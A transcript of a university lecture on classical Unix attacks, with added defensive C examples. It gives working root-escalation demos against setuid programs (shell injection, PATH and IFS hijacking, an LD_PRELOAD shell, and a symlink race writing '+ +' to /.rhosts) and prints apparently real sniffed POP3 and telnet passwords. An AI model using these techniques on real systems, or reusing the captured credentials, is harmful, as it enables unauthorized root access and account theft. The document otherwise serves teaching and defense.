Classical Hacking technique
Taeho Oh, http://postech.edu/~ohhara
Transcript of a PowerPoint presentation.
Contents (1)
• Physical attack
• Social engineering
• Shell escape
• PATH attack
• IFS attack
• LD_PRELOAD attack
• Race condition

Contents (2)
• Buffer overflow
• Sniff
• IP Spoof
• Misconfiguration
Physical attack
• Search for passwords in the admin's desk
• Steal a hard disk or a computer
• Break the door with a hammer
Social engineering
• Ask the admin for the admin's password
• Send an email to all users telling them to change their password
Shell escape (1)
• Try to get a shell from a program by passing it shell escape characters (shell metacharacters)
• Ex) ; | , ' " ! % & ( ) . . .
Shell escape (2)
[ ohhara@ohhara ~ ] {1} $ cat ex_finger.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Deliberately vulnerable demo: argv[1] is pasted unchecked into a shell command line */
int main(int argc, char **argv)
{
    char cmd[100];
    setuid(0);
    setgid(0);
    if (argc > 1) {
        /* bounded copy; the injection, not the buffer size, is the point of the demo */
        snprintf(cmd, sizeof cmd, "/usr/bin/finger %s", argv[1]);
        system(cmd);
    }
    return 0;
}
[ ohhara@ohhara ~ ] {2} $ ls -l ex_finger
---s--x--x 1 root root 22961 Jan 3 19:33 ex_finger*
Shell escape (4)
[ ohhara@ohhara ~ ] {3} $ ./ex_finger 'bin;/bin/sh'
Login name: bin
Directory: /usr/bin
Never logged in.
Mail last read Fri Dec 31 17:50:28 1999
No Plan.
# whoami
root
#
The program executes "/usr/bin/finger bin;/bin/sh": the shell started by system() treats ";" as a command separator, so /bin/sh runs with the program's root privileges.
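What ex_finger needs instead of system(): as an added example (not code from the slides), the same wrapper written so that no shell ever sees argv[1]. The user name is checked against a strict allowlist and finger is started through execve() with a fixed argv array and a fixed environment, so ";" or "|" cannot change the command. valid_username(), the MAX_USER limit and the environment contents are this example's assumptions; it also assumes finger accepts "--" to end option parsing, as getopt-based commands do.

```c
/* Added example: ex_finger without a shell. Not from the original slides. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define MAX_USER 32   /* assumption: longest acceptable login name */

/* Returns 1 when `name` looks like a login name (letters, digits, '_', '-', '.';
 * must start with a letter or '_'; 1..MAX_USER characters), otherwise 0.
 * Every shell metacharacter from the slide is rejected by construction. */
int valid_username(const char *name)
{
    if (name == NULL || *name == '\0')
        return 0;
    if (!(isalpha((unsigned char)name[0]) || name[0] == '_'))
        return 0;
    size_t len = strlen(name);
    if (len > MAX_USER)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.'))
            return 0;
    }
    return 1;
}

/* Runs /usr/bin/finger on one validated user with no shell in between.
 * Returns the child's exit status, or -1 on invalid input or fork failure. */
int run_finger(const char *user)
{
    if (!valid_username(user))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* "--" ends option parsing, so a name starting with '-' is not an option */
        char *const argv[] = { "finger", "--", (char *)user, NULL };
        char *const envp[] = { "PATH=/usr/bin:/bin", NULL };   /* minimal environment */
        execve("/usr/bin/finger", argv, envp);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s user\n", argv[0]);
        return 2;
    }
    if (!valid_username(argv[1])) {
        fprintf(stderr, "rejected user name\n");
        return 1;
    }
    return run_finger(argv[1]) == 0 ? 0 : 1;
}
```

The allowlist is deliberately narrower than what a shell would escape: rejecting everything except known-good characters is easier to get right than trying to quote every metacharacter, and execve() means there is no shell to escape in the first place.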
PATH attack (1)
• PATH is the search path for executable programs
• PATH can be changed by the hacker
PATH attack (2)
[ ohhara@ohhara ~ ] {1} $ cat ex_who.c
#include <stdlib.h>
#include <unistd.h>

/* Deliberately vulnerable demo: "who" is looked up through the caller's PATH */
int main(void)
{
    setuid(0);
    setgid(0);
    system("who");
    return 0;
}
[ ohhara@ohhara ~ ] {2} $ ls -l ex_who
---s--s--x 1 root root 3136 Mar 6 17:29 ex_who*
PATH attack (3)
[ ohhara@ohhara ~ ] {3} $ cat who
#!/bin/sh
/bin/sh
[ ohhara@ohhara ~ ] {4} $ PATH=.:${PATH}
[ ohhara@ohhara ~ ] {5} $ export PATH
[ ohhara@ohhara ~ ] {6} $ ./ex_who
# whoami
root
#
The program executes not "/usr/bin/who" but "./who", because "." now comes first in PATH.
IFS attack (1)
• IFS is the Internal Field Separator
• Command arguments are separated by the IFS value
  – Default IFS value is ' '
  – Ex)
    • ls -al  -> ls -al  ( IFS = ' ' )
    • ls/-al  -> ls -al  ( IFS = '/' )
IFS attack (2)
[ ohhara@ohhara ~ ] {1} $ cat ex_date.c
#include <stdlib.h>
#include <unistd.h>

/* Deliberately vulnerable demo: absolute path, but still run through the shell */
int main(void)
{
    setuid(0);
    setgid(0);
    system("/bin/date");
    return 0;
}
[ ohhara@ohhara ~ ] {2} $ ls -l ex_date
---s--x--x 1 root root 22811 Jan 3 21:19 ex_date*
IFS attack (3)
[ ohhara@ohhara ~ ] {3} $ cat bin
#!/bin/sh
IFS=' '
export IFS
/bin/sh
[ ohhara@ohhara ~ ] {4} $ IFS=/
[ ohhara@ohhara ~ ] {5} $ export IFS
[ ohhara@ohhara ~ ] {6} $ PATH=.:${PATH}
[ ohhara@ohhara ~ ] {7} $ export PATH
IFS attack (4)
[ ohhara@ohhara ~ ] {8} $ ./ex_date
# whoami
root
#
With IFS set to "/", the shell splits "/bin/date" into the words "bin" and "date", so it executes not "/bin/date" but "bin date", and "bin" is found as "./bin" through PATH.
LD_PRELOAD attack (1)
• LD_LIBRARY_PATH is the dynamic link library search path
• LD_PRELOAD lists dynamic link libraries that are loaded before any library found via LD_LIBRARY_PATH
LD_PRELOAD attack (2)
[ ohhara@ohhara ~ ] {1} $ cat ex_print.c
#include <stdio.h>
#include <unistd.h>

/* Demo target: the only thing it does after gaining root is call printf() */
int main(void)
{
    setuid(0);
    setgid(0);
    printf("hello!\n");
    return 0;
}
[ ohhara@ohhara ~ ] {2} $ ls -l ex_print
---s--x--x 1 root root 4290 Jan 3 21:48 ex_print*
LD_PRELOAD attack (3)
[ ohhara@ohhara ~ ] {3} $ cat ex_print_so.c
#include <unistd.h>

/* Replacement printf() injected via LD_PRELOAD: starts a shell instead of printing */
void printf(char *str)
{
    execl("/bin/sh", "sh", (char *)0);
}
[ ohhara@ohhara ~ ] {4} $ gcc -shared -o ex_print_so.so ex_print_so.c
[ ohhara@ohhara ~ ] {5} $ LD_PRELOAD=./ex_print_so.so
[ ohhara@ohhara ~ ] {6} $ export LD_PRELOAD
LD_PRELOAD attack (4)
[ ohhara@ohhara ~ ] {7} $ ./ex_print
# whoami
root
#
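The PATH, IFS and LD_PRELOAD sessions above all exploit one thing: a setuid program trusting the environment its caller hands it. The following is an added example, not code from the slides, showing the defensive counterpart for the ex_date case: rebuild a minimal environment and run the helper by absolute path through execve(), so neither PATH lookup, shell word splitting nor the dynamic loader sees caller-controlled values. The KEEP_VARS allowlist, the fixed SAFE_PATH and the function names are this example's assumptions.

```c
/* Added example: environment sanitisation for a setuid helper. Not from the slides. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define SAFE_PATH "PATH=/usr/bin:/bin"   /* assumption: fixed, trusted search path */

/* Only these variables survive; everything else (PATH, IFS, LD_*, ...) is dropped. */
static const char *const KEEP_VARS[] = { "TERM", "LANG", "TZ", NULL };

static int is_kept(const char *entry)
{
    for (int i = 0; KEEP_VARS[i] != NULL; i++) {
        size_t n = strlen(KEEP_VARS[i]);
        if (strncmp(entry, KEEP_VARS[i], n) == 0 && entry[n] == '=')
            return 1;
    }
    return 0;
}

/* Copies allowlisted entries from `in` into `out` (NULL-terminated), always
 * placing SAFE_PATH first. Returns the number of entries written, or -1 when
 * `out` (capacity `max`, counting the terminating NULL) is too small. */
int sanitize_env(char *const *in, const char **out, size_t max)
{
    size_t n = 0;
    if (max < 2)
        return -1;
    out[n++] = SAFE_PATH;
    for (size_t i = 0; in[i] != NULL; i++) {
        if (!is_kept(in[i]))
            continue;                  /* drops PATH, IFS, LD_PRELOAD, LD_LIBRARY_PATH, ... */
        if (n + 1 >= max)
            return -1;
        out[n++] = in[i];
    }
    out[n] = NULL;
    return (int)n;
}

/* Returns 1 if no entry of `env` starts with "LD_" or "IFS=", otherwise 0. */
int env_is_clean(const char **env)
{
    for (size_t i = 0; env[i] != NULL; i++)
        if (strncmp(env[i], "LD_", 3) == 0 || strncmp(env[i], "IFS=", 4) == 0)
            return 0;
    return 1;
}

/* ex_date done safely: absolute path, no shell, sanitised environment.
 * Returns the child's exit status or -1 on failure. */
int run_date_safely(char *const *inherited)
{
    const char *env[64];
    if (sanitize_env(inherited, env, 64) < 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "date", NULL };
        execve("/bin/date", argv, (char *const *)env);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv, char **envp)
{
    (void)argc; (void)argv;
    return run_date_safely(envp) == 0 ? 0 : 1;
}
```

Two caveats for anyone reproducing the slides on a current system: the glibc dynamic loader runs setuid programs in secure-execution mode and ignores an LD_PRELOAD entry such as ./ex_print_so.so, and modern Bourne-style shells apply IFS only when splitting the results of expansions, not literal words like /bin/date in a script. The sessions as shown therefore no longer work unchanged, but the underlying mistake, letting caller-controlled environment reach system() or a library search, is still the same, and the fix above does not depend on those loader or shell behaviours.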
Race condition (1)
• A race condition occurs when two or more processes try to use one resource at the same time
• In UNIX security, race conditions occur in the file system
Race condition (2)
  Normal process (setuid root)          Attack process
  ----------------------------          --------------
  access("good", W_OK)  -> OK
                                        remove "good"
                                        link "good" to "/.rhosts"
  open("good", O_WRONLY)
  write: not to "good" but to "/.rhosts"
Race condition (3)
[ ohhara@ohhara ~ ] {1} $ cat ex_race.c
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>

/* Deliberately vulnerable demo: the access() check and the open() are separated by a window */
int main(void)
{
    int fd;
    char *data = "+ +\n";
    setuid(0);
    setgid(0);
    if (access("good", W_OK) == 0) {
        sleep(3);                      /* widens the race window so the demo is easy to win */
        fd = open("good", O_WRONLY|O_TRUNC|O_CREAT, 0644);
        write(fd, data, 4);
        close(fd);
    }
    return 0;
}
[ ohhara@ohhara ~ ] {2} $ ls -l ex_race
---s--x--x 1 root root 4728 Jan 4 13:23 ex_race*
Race condition (5)
[ ohhara@ohhara ~ ] {3} $ ls -l /.rhosts
ls: /.rhosts: No such file or directory
[ ohhara@ohhara ~ ] {4} $ touch good
[ ohhara@ohhara ~ ] {5} $ ./ex_race & ; ln -sf /.rhosts good
[ ohhara@ohhara ~ ] {6} $ cat /.rhosts
+ +
[ ohhara@ohhara ~ ] {7} $ rlogin -l root localhost
# whoami
root
#
The symlink is swapped in during the 3-second window between access() and open(), so the root-privileged write lands in /.rhosts; the "+ +" entry then lets any user from any host rlogin as root.
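The defence against the ex_race pattern is to stop checking the path and start checking the object actually opened. Below is an added example (not code from the slides): open without O_CREAT or O_TRUNC, refuse to follow symlinks with O_NOFOLLOW, verify with fstat() that the descriptor refers to a regular, single-link file owned by the expected user, and only then truncate. The scratch file name, the owner check and the function names are this example's assumptions; demo_toctou_defense() builds its own temporary file and symlink so the behaviour can be observed offline.

```c
/* Added example: TOCTOU-resistant file open. Not from the original slides. */
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Returns 1 when `st` describes a regular file with exactly one link owned by `owner`. */
int is_plain_owned_file(const struct stat *st, uid_t owner)
{
    return S_ISREG(st->st_mode) && st->st_nlink == 1 && st->st_uid == owner;
}

/* Opens `path` for writing without creating, truncating or following symlinks,
 * then validates the object behind the descriptor. Returns the fd or -1 (errno set). */
int safe_open_owned(const char *path, uid_t owner)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;                     /* a symlink such as good -> /.rhosts fails with ELOOP */
    if (fstat(fd, &st) < 0 || !is_plain_owned_file(&st, owner)) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    if (ftruncate(fd, 0) < 0) {        /* truncate only after the checks passed */
        close(fd);
        return -1;
    }
    return fd;
}

/* Self-check: a plain temp file is accepted, a symlink to it is refused.
 * Returns 0 when both behave as expected, otherwise the number of the failed step. */
int demo_toctou_defense(void)
{
    char file[] = "/tmp/toctou_XXXXXX";   /* constructed scratch file */
    char link[64];
    int rc = 0;
    int fd = mkstemp(file);
    if (fd < 0)
        return 1;
    close(fd);
    snprintf(link, sizeof link, "%s.lnk", file);
    fd = safe_open_owned(file, getuid());
    if (fd < 0)
        rc = 2;                         /* the genuine file must be accepted */
    else
        close(fd);
    if (rc == 0 && symlink(file, link) < 0)
        rc = 3;
    if (rc == 0) {
        fd = safe_open_owned(link, getuid());
        if (fd >= 0) {                  /* the symlink must be refused */
            close(fd);
            rc = 4;
        } else if (errno != ELOOP) {
            rc = 5;
        }
        unlink(link);
    }
    unlink(file);
    return rc;
}

int main(void)
{
    int rc = demo_toctou_defense();
    if (rc == 0)
        puts("TOCTOU checks behave as expected");
    else
        printf("check %d failed\n", rc);
    return rc;
}
```

The ordering matters: access() answered a question about a name, and the name was re-bound before it was used. fstat() answers a question about the open descriptor, which the attacker can no longer swap. For a setuid program the simpler alternative is to drop to the real user id (seteuid) before touching user-controlled paths at all.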
Buffer overflow (1)
• Write to unexpected memory areas by overflowing a buffer
• The most famous hacking technique
• In almost all cases, "buffer overflow" means stack buffer overflow
  – Recently, heap buffer overflow attacks have been introduced

Buffer overflow (2)
• Hackers can execute arbitrary commands by overflowing a buffer
• Machine- and OS-dependent hacking technique
• This topic will be discussed later
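As an added example (not code from the slides), here is the unbounded copy that makes a stack buffer overflow possible, beside a bounded copy that refuses oversize input. The login_record layout and the function names are this example's own; the point is that the bytes past `name` belong to another variable the caller never meant to write.

```c
/* Added example: unbounded vs. bounded copy into a fixed-size field. Not from the slides. */
#include <stdio.h>
#include <string.h>

struct login_record {
    char name[16];
    int  is_admin;          /* sits right after `name` in memory on common compilers */
};

/* Vulnerable: strcpy() stops at the NUL of `src`, not at the end of `dst`.
 * With input longer than 15 characters it overwrites whatever follows `name`.
 * Shown for contrast only; nothing in this file calls it with oversize input. */
void copy_name_unbounded(struct login_record *r, const char *src)
{
    strcpy(r->name, src);
}

/* Hardened: copies only if `src` fits (including the terminating NUL) and
 * returns 0; otherwise returns -1 and leaves the record untouched. */
int copy_name_bounded(struct login_record *r, const char *src)
{
    size_t len = strlen(src);
    if (len >= sizeof r->name)
        return -1;
    memcpy(r->name, src, len + 1);
    return 0;
}

/* Feeds a batch of inputs through the bounded copy and returns how many were
 * rejected; returns -1 if the neighbouring field was ever disturbed. */
int count_rejected(const char *const *inputs, size_t n)
{
    int rejected = 0;
    for (size_t i = 0; i < n; i++) {
        struct login_record r = { "", 0 };
        if (copy_name_bounded(&r, inputs[i]) != 0)
            rejected++;
        else if (r.is_admin != 0)
            return -1;
    }
    return rejected;
}

int main(void)
{
    /* constructed inputs: two that fit and one 32-byte overflow attempt */
    const char *const samples[] = { "ohhara", "bin", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" };
    printf("%d of 3 inputs rejected\n", count_rejected(samples, 3));
    return 0;
}
```

ex_finger's `char cmd[100]` filled by sprintf() is the same pattern: the destination has a fixed size, the source is chosen by the caller, and nothing in between compares the two.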
Sniff (1)
• Ethernet broadcasts to transmit data
• Hackers can see all network packets on the Ethernet
  – Network packets contain user ids, passwords, and other useful information
• The easiest and the most powerful hacking technique
Sniff (2)
[Diagram: a normal network packet is broadcast on the Ethernet segment, so the hacker's host can see the network packet]
Sniff (3)
# whoami
root
# hostname
gdt.postech.ac.kr

Sniff (4)
# cat tcp.log
cogs.postech.ac.kr => mx1.postech.ac.kr [110]
USER nllbut
PASS cj+]PpS!
UIDL
STAT
QUIT
----- [FIN]

Sniff (5)
211.33.152.182 => monsky.postech.ac.kr [23]
#'$vt100!ohhara
zXfYpZgAd/!
-----+ [Timed Out]+
#
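Port 110 is POP3 and port 23 is telnet; both carry the login name and password in clear, which is exactly what tcp.log above shows. From the defender's side the same capture layout can be scanned to find out which hosts still authenticate over plaintext protocols. The following is an added example (not code from the slides): a small detector that reads a log in the "src => dst [port]" layout and counts sessions that sent a PASS line on a plaintext-protocol port. The sample log, the port list and the function names are constructed for this example, and the credentials in it are fake.

```c
/* Added example: cleartext-credential detector over tcp.log-style lines. Not from the slides. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Ports of protocols that send passwords unencrypted (assumption for this example). */
static const int CLEARTEXT_PORTS[] = { 21, 23, 110, 143 };

static int is_cleartext_port(int port)
{
    for (size_t i = 0; i < sizeof CLEARTEXT_PORTS / sizeof *CLEARTEXT_PORTS; i++)
        if (CLEARTEXT_PORTS[i] == port)
            return 1;
    return 0;
}

/* Parses "src => dst [port]". Returns 1 and stores the port on success, else 0. */
int parse_session_header(const char *line, int *port)
{
    const char *arrow = strstr(line, " => ");
    const char *lb = arrow ? strrchr(arrow, '[') : NULL;
    char *end;
    if (lb == NULL)
        return 0;
    long p = strtol(lb + 1, &end, 10);
    if (end == lb + 1 || *end != ']' || p < 1 || p > 65535)
        return 0;
    *port = (int)p;
    return 1;
}

/* Walks the log line by line. A session is flagged once if its port is a
 * cleartext-protocol port and a "PASS " line (POP3/FTP) appears inside it.
 * Returns the number of flagged sessions. */
int count_cleartext_logins(const char *log)
{
    int flagged = 0, port = 0, in_clear = 0, already = 0;
    const char *p = log;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[256];
        if (len >= sizeof line)
            len = sizeof line - 1;           /* overlong lines are truncated, never overflow */
        memcpy(line, p, len);
        line[len] = '\0';
        if (parse_session_header(line, &port)) {
            in_clear = is_cleartext_port(port);
            already = 0;
        } else if (in_clear && !already && strncmp(line, "PASS ", 5) == 0) {
            flagged++;
            already = 1;
        }
        p = nl ? nl + 1 : p + len;
    }
    return flagged;
}

/* Constructed sample in the tcp.log layout (hosts and credentials are fake). */
static const char SAMPLE_LOG[] =
    "client1.example.net => mail.example.net [110]\n"
    "USER alice\n"
    "PASS not-a-real-password\n"
    "QUIT\n"
    "----- [FIN]\n"
    "client2.example.net => mail.example.net [995]\n"   /* POP3 over TLS: not flagged */
    "USER bob\n"
    "PASS still-fake\n"
    "----- [FIN]\n"
    "client3.example.net => ftp.example.net [21]\n"
    "USER carol\n"
    "PASS fake-too\n"
    "----- [FIN]\n";

int main(void)
{
    printf("%d cleartext password exchange(s) seen\n", count_cleartext_logins(SAMPLE_LOG));
    return 0;
}
```

On the sample log the 110 and 21 sessions are flagged and the 995 session is not. Telnet logins (port 23) do not use a PASS keyword, so the slide's second session would need a different rule, such as flagging any payload at all on port 23; the remedy in every case is the same, replacing the plaintext protocol with an encrypted one rather than trying to hide the traffic.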
IP spoof
• Hackers can spoof their IP address
• Hackers try to connect to rsh and rlogin services with a spoofed IP address
• Hackers have to know the next sequence number to open a TCP session with a spoofed IP address
• This topic will be discussed later
Misconfiguration
• Hackers search for the admin's mistakes
  – Ex)
    • Null/simple password account
    • NFS export to everyone
    • Writable ftp home directory
    • Open X window display
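Two of the mistakes on the list can be caught by reading a configuration file line by line. The following is an added example (not code from the slides): one check for an NFS export open to everyone and one for an account whose password field is empty. The input lines are constructed here in /etc/exports and /etc/passwd (or /etc/shadow) layout, no real system file is read, and the function names are this example's own.

```c
/* Added example: line-level checks for two classic misconfigurations. Not from the slides. */
#include <stdio.h>
#include <string.h>

/* /etc/exports line: "<path> [client(options) ...]". Returns 1 when the export
 * has no client list at all, uses only "(options)", or names "*" as a client;
 * 0 for restricted exports, blank lines and comments. */
int exports_line_is_open_to_everyone(const char *line)
{
    char buf[512];
    strncpy(buf, line, sizeof buf - 1);     /* strtok() needs a writable copy */
    buf[sizeof buf - 1] = '\0';
    char *tok = strtok(buf, " \t\r\n");
    if (tok == NULL || tok[0] == '#')
        return 0;
    int clients = 0;
    while ((tok = strtok(NULL, " \t\r\n")) != NULL) {
        clients++;
        if (tok[0] == '(')
            return 1;                        /* "(rw)" with no host: options for everyone */
        if (tok[0] == '*' && (tok[1] == '\0' || tok[1] == '('))
            return 1;                        /* "*" or "*(rw)" */
    }
    return clients == 0;                     /* "/home" alone exports to everyone */
}

/* passwd/shadow line "name:password:...". Returns 1 when the password field is
 * empty, i.e. the account logs in with no password; malformed lines return 0. */
int passwd_line_has_empty_password(const char *line)
{
    const char *c1 = strchr(line, ':');
    if (c1 == NULL)
        return 0;
    return c1[1] == ':';
}

/* Applies one of the checks above to a batch of lines and returns the number of findings. */
int count_findings(int (*check)(const char *), const char *const *lines, size_t n)
{
    int hits = 0;
    for (size_t i = 0; i < n; i++)
        hits += check(lines[i]);
    return hits;
}

int main(void)
{
    /* constructed sample lines */
    const char *const exports[] = {
        "# sample /etc/exports",
        "/home  *(rw)",                           /* world export */
        "/srv/data",                              /* no client list: world export */
        "/srv/ok  192.0.2.10(ro) 192.0.2.11(ro)"  /* restricted */
    };
    const char *const passwd[] = {
        "root:x:0:0:root:/root:/bin/sh",
        "guest::500:500:guest:/home/guest:/bin/sh", /* empty password field */
        "bin:x:1:1:bin:/bin:/sbin/nologin"
    };
    printf("world exports: %d, empty passwords: %d\n",
           count_findings(exports_line_is_open_to_everyone, exports, 4),
           count_findings(passwd_line_has_empty_password, passwd, 3));
    return 0;
}
```

The corrected forms are the ones the checks let through: an export that names each client (or subnet) explicitly, and an account line whose second field holds a hash or a lock marker rather than nothing.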